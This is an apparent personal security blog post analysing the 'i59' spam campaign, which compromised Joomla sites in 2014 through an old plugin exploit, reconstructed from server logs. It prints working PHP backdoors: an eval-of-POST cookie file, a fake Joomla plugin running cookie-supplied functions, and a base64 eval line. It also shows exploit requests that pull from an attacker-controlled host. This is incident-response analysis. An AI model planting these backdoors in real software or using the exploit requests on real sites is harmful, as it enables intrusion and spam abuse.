Yinette's Webshite

A collection of security stuff and all sorts of other random shit.

I59

i59 – a story of spammers, pornography, and really old joomla exploits

Last year, there was a similar campaign also using Joomla sites as well as Wordpress to send spam. It was officially known as “Rodecap”, you can find a good write up on it here: http://www.abuse.ch/?tag=rodecap What made it unusual was that the IPs that were hitting the Malicious PHP script were in fact infected Windows boxes. This one, which I’m calling i59 (due to absence of any other name) appears to be the replacement for our old friend rodecap. It’s called i59 due to the extensive use of the $i59 variable within the script.

This was mostly uncovered using log diving, grep, and a shitload of caffeine.

Please note the filenames here are what I discovered in this particular instance of an i59 infection. It seems each case has a different place where things are stored, named, etc.

Anything i’ve got wrong, please let me know! I’ve had very ample time to properly look into this…

The story begins, initial vector

It appears that this all started around the 24/25th of May 2014, the exploit in question is this one: http://www.exploit-db.com/exploits/17995/ – From my research, it looks like this has already been patched by the nonumber developer.

188.208.33.18 - - [24/May/2014:03:25:01 +1000] "POST /index.php?nn_qp=1&url=http://5.34.177.110/about/ HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0"
188.208.33.18 - - [24/May/2014:03:25:04 +1000] "POST /index.php?nn_qp=1&url=http://www.nonumber.nl/about/ HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0"
188.208.33.18 - - [24/May/2014:03:25:06 +1000] "POST /components/a.php HTTP/1.1" 200 143 "-" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0"
188.208.33.18 - - [24/May/2014:03:25:08 +1000] "GET /components/4idf49.php HTTP/1.1" 200 62084 "-" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0"

The IP 5.34.177.110 doesn’t respond to anything at the moment. Either it was withdrawn or destroyed, but the IP belongs to a Hosting mob from Ukraine, to be specific, the town of Kharkiv. This looks as if it would have had the remote shell, however without the full POST data I cannot tell for sure.

Secondly, our First actor 188.208.33.18 from Romania is always the IP that injects and establishes the foothold on the Joomla site it has infected.

The first thing it puts on the site is a basic PHP script that can be used to gather some information:

md5: 305038e2f82471a683ccdd71078a02d9

# Netscape HTTP Cookie File
# http://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.

5.34.177.110    FALSE   /about/ FALSE   0       <?eval(stripslashes(array_pop($_POST)))>       1

Seems to also carry some meta-data.

From there it will have already uploaded the next stage:

md5: ad354405da14c4cdc5957cc84bc2ee49

/**
 * @package     Joomla.Plugin.System
 * @since       1.5
 *
 *
 */
class PlgSysJoomla {
public function __construct() {
$file=@$_COOKIE['Jlma3'];
if ($file){ $opt=$file(@$_COOKIE['Jlma2']); $au=$file(@$_COOKIE['Jlma1']); $opt("/292/e",$au,292); die();} else {phpinfo();die;}}}

Sneaky fecker pretends to be a part of Joomla. Romania’s role here is to just make sure it returns the phpinfo…

About a week later, Romania comes back and throws some stuff at our fake joomla component:

188.208.33.18 - - [06/Jul/2014:21:45:47 +1000] "POST /components/4idf49.php HTTP/1.1" 200 70 "http://www.google.com" "Mozilla/7.0 (Windows XP 6.1; rv:12.1) Gecko/2014 Firefox/11.1"

This is where the next file is born…

md5sum: 7fdd8a13ae5c0a3ee2713e8c3ddf39d4

Look at the attached file ‘395adn.php’

I haven’t had time to properly dissect this, but I’m sure someone out there would like to. Mostly from inference, guessing and experience, this appears to be a webshell and a file uploader.

From here, there is a bit of silence, It’s possible that this was just the foothold that would be sold-on to whoever wanted a lot of joomla sites to do naughty things with… Might be interesting to see what sort of chatter was going on in the Russian cybercrim forums around this time.

So a month later, we meet a new actor:

37.139.47.122 - - [07/Jul/2014:22:06:04 +1000] "GET /components/com_podcastmedia/395adn.php HTTP/1.1" 200 106 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:06:06 +1000] "POST /components/com_podcastmedia/395adn.php HTTP/1.1" 200 2214 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:06:09 +1000] "POST /components/com_podcastmedia/395adn.php HTTP/1.1" 200 3360 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"

our friend 37.139.47.122 is from St. Petersburg Russia.

He immediately will upload his back doors, as well as spread a whole bunch of shit around. I like to call this the ‘arse spraying mayhem’


37.139.47.122 - - [07/Jul/2014:22:06:23 +1000] "POST /libraries/getid3/module.audio.bonk.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:06:27 +1000] "POST /modules/mod_banners/mod_banners.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:06:41 +1000] "POST /modules/mod_articles_archive/mod_articles_archive.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:06:54 +1000] "POST /components/com_banners/models/search.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:06:56 +1000] "POST /libraries/fof/toolbar/sql.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:06:58 +1000] "POST /libraries/cms/view/db.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:00 +1000] "POST /components/com_sh404sef/system.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:02 +1000] "POST /media/mediaelements/js/list.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:04 +1000] "POST /libraries/joomla/installer/ajax.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:06 +1000] "POST /media/editors/codemirror/object.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:08 +1000] "POST /components/com_k2/controllers/title.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:10 +1000] "POST /modules/mod_feed/tmpl/help.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:12 +1000] "POST /components/com_mailto/helpers/alias.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:14 +1000] "POST /components/com_content/controllers/sql.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:16 +1000] "POST /plugins/search/contacts/menu.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:18 +1000] "POST /media/system/css/proxy.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:20 +1000] "POST /components/com_jce/options.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:23 +1000] "POST /modules/mod_footer/tmpl/gallery.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:25 +1000] "POST /templates/view.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:27 +1000] "POST /components/com_mailto/themes.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:31 +1000] "POST /logs/menu.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:33 +1000] "POST /libraries/phputf8/utils/page.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"

POSTs are to confirm everything is there and working.

This basically puts this into a bunch of files, as well as into the top of some already existing files:

eval(base64_decode($_POST['ne0080b']));

Effectively giving this bot leverage to execute arbitrary PHP from any of it’s several ‘mini backdoors’

This IP will also be responsible for maintaining the bot, and making sure that it can still get in.

I’ve also observed this thing messing with file modification times, so it was kinda tricky to properly link this all together.

a few days pass…

37.139.47.243 - - [11/Jul/2014:06:45:48 +1000] "POST /libraries/fof/toolbar/sql.php HTTP/1.1" 200 185 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"

This is where the star of the show is born… i59!

md5sum: 71a7c769e644d8cf3cf32419239212c7

again, i59 is something I haven’t had the time to properly dissect, even though it is the star of the show, it’s kept me more busy trying to track its ass down and stop the machine it has infected from being RBL’d for trying to spam Porno links to everyone on AOL and Yahoo.

But this is the component that sends the spam, as evident in the following log snippet:

66.33.212.107 - - [25/Jul/2014:02:53:20 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
210.48.148.152 - - [25/Jul/2014:02:58:57 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2528 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
210.48.148.152 - - [25/Jul/2014:02:59:10 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2558 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
210.48.148.152 - - [25/Jul/2014:02:59:22 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2577 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
210.48.148.152 - - [25/Jul/2014:02:59:34 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3301 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
210.48.148.152 - - [25/Jul/2014:02:59:43 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
69.89.31.184 - - [25/Jul/2014:03:08:30 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 1614 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
69.89.31.184 - - [25/Jul/2014:03:08:48 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
91.121.12.223 - - [25/Jul/2014:03:09:48 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
77.222.61.150 - - [25/Jul/2014:03:10:38 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 5164 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
77.222.61.150 - - [25/Jul/2014:03:10:49 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 4871 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
77.222.61.150 - - [25/Jul/2014:03:10:57 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 4667 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
77.222.61.150 - - [25/Jul/2014:03:11:08 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 5132 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
77.222.61.150 - - [25/Jul/2014:03:11:16 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
74.220.219.67 - - [25/Jul/2014:03:13:10 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
77.222.56.213 - - [25/Jul/2014:03:14:51 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
77.222.61.243 - - [25/Jul/2014:03:16:37 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 1058 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
77.222.61.243 - - [25/Jul/2014:03:16:49 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
66.147.244.240 - - [25/Jul/2014:03:19:34 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3203 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
66.147.244.240 - - [25/Jul/2014:03:19:47 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.217.112.247 - - [25/Jul/2014:03:21:22 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3457 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.217.112.247 - - [25/Jul/2014:03:21:32 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3188 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.217.112.247 - - [25/Jul/2014:03:21:42 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3683 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.217.112.247 - - [25/Jul/2014:03:21:54 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3975 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.217.112.247 - - [25/Jul/2014:03:22:08 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2912 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.217.112.247 - - [25/Jul/2014:03:22:17 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
66.147.244.153 - - [25/Jul/2014:03:24:02 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2302 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
92.53.106.199 - - [25/Jul/2014:03:29:24 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3912 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
92.53.106.199 - - [25/Jul/2014:03:29:44 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2899 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
92.53.106.199 - - [25/Jul/2014:03:30:13 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
92.53.106.199 - - [25/Jul/2014:03:30:32 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3394 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
69.16.199.30 - - [25/Jul/2014:03:35:19 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2509 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
69.16.199.30 - - [25/Jul/2014:03:35:27 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
199.168.99.123 - - [25/Jul/2014:03:36:12 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
141.105.121.139 - - [25/Jul/2014:03:41:00 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
66.147.244.245 - - [25/Jul/2014:03:42:32 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3196 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
66.147.244.245 - - [25/Jul/2014:03:42:45 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.145.239.8 - - [25/Jul/2014:03:46:24 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.145.239.8 - - [25/Jul/2014:03:46:34 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3894 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.145.239.8 - - [25/Jul/2014:03:47:13 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2186 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.145.239.8 - - [25/Jul/2014:03:47:31 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 1673 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.145.239.8 - - [25/Jul/2014:03:47:50 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2219 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.145.239.8 - - [25/Jul/2014:03:48:01 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2142 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.145.239.8 - - [25/Jul/2014:03:48:31 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"

Why some of these are getting 500s, i’m not sure… It could be the server’s load or a problem in the i59 script itself… Either way it was filling up mailqueue with annoying filth.

UPDATE: The 500’s seem to be caused by me setting restrictive facls on the postfix binary, lol!

[Fri Jul 25 04:13:09 2014] [error] [client 184.107.157.218] sh: /usr/sbin/sendmail: Permission denied
[Fri Jul 25 04:13:09 2014] [error] [client 184.107.157.218] sh: /usr/sbin/sendmail: Permission denied
[Fri Jul 25 04:13:09 2014] [error] [client 184.107.157.218] sh: /usr/sbin/sendmail: Permission denied
[Fri Jul 25 04:13:09 2014] [error] [client 184.107.157.218] sh: /usr/sbin/sendmail: Permission denied

Trololololololololol

All communications of i59 are done with the same User-Agent: "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"

This is where I draw the parallel to Rodecap. I’m unsure what these IPs are, if they’re compromised machines or what. But they supply the spam in encrypted payloads.

balls… will have to find a format that gist doesn’t shit its pants over…